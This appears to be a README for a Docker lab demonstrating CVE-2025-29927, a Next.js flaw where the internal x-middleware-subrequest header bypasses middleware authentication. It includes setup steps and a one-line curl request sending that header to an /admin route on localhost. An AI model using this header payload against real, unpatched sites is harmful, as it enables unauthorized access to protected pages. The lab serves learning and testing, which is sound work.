## https://sploitus.com/exploit?id=193EBA14-19AE-543F-9863-C30F805BD3BC
# CVE-2025-29927 (Critical - 9.1)
Next.js Middleware Bypass Vulnerability
Hands-On of CVE-2025-29927 vulnerability in Next.js application where the internal header x-middleware-subrequest can be used to bypass middleware authentication and restricted access.
# Explained
Next.js use an internal header "x-middleware-subrequest" to prevent recursive requests from triggering infinite loops. The security vulnerability shows it's possible to skip running Middleware, which could allow requests to bypass critical checks—such as authorization, cookie validation—before reaching routes.
# Patched Versions
Next.Js 15.2.3, 14.2.25, 13.5.9, 12.3.5
# Setup Environment
1) Clone this Repository.
2) Start docker in your system
3) Go to repo path & build the image with: docker build -t nextjs-docker-demo .
4) Next, run the container: docker run -p 3000:3000 nextjs-docker-demo
5) Access the environment: http://localhost:3000
6) Test/Exploit: curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
# Official Blog
https://nextjs.org/blog/cve-2025-29927